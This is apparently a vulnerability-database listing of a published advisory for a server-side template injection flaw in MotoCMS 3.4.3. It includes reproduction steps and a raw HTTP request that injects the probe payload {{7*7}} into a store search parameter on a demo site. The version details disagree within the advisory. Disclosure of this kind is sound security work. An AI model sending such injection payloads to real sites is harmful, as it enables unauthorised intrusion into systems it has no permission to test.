Lucene search

K

MotoCMS Version 3.4.3 - Server-Side Template Injection Vulnerability

🗓️ 31 May 2023 00:00:00Reported by tmrswrrType 
zdt
 zdt
🔗 0day.today👁 8764 Views

MotoCMS 3.4.3 SSTI Vulnerability in Store Templat

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
# Title: MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)
# Author: tmrswrr
# Vendor: https://www.motocms.com
# Link: https://www.motocms.com/website-templates/demo/189526.html
# Vulnerable Version(s): MotoCMS  3.0.27


## Description
MotoCMS Version 3.4.3 Store Category Template was discovered to contain a Server-Side Template
Injection (SSTI) vulnerability via the keyword parameter.

## Steps to Reproduce
1. Open the target URL: https://template189526.motopreview.com/
2. Write payload here : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}
3. You will be see result is 49



Vuln Url : https://template189526.motopreview.com/store/category/search/?page=1&limit=36&keyword={{7*7}}


GET /store/category/search/?page=&limit=&keyword={{7*7}} HTTP/1.1
Host: template189526.motopreview.com
Cookie: PHPSESSID=7c0qgdvsehaf1a2do6s0bcl4p0; 9b7029e0bd3be0d41ebefd47d9f5ae46_session-started=1685536759239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://template189526.motopreview.com/store/category/search/?keyword=%7B%7B3*3%7D%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 May 2023 00:00Current
7.1High risk
Vulners AI Score7.1
8764
.json
Report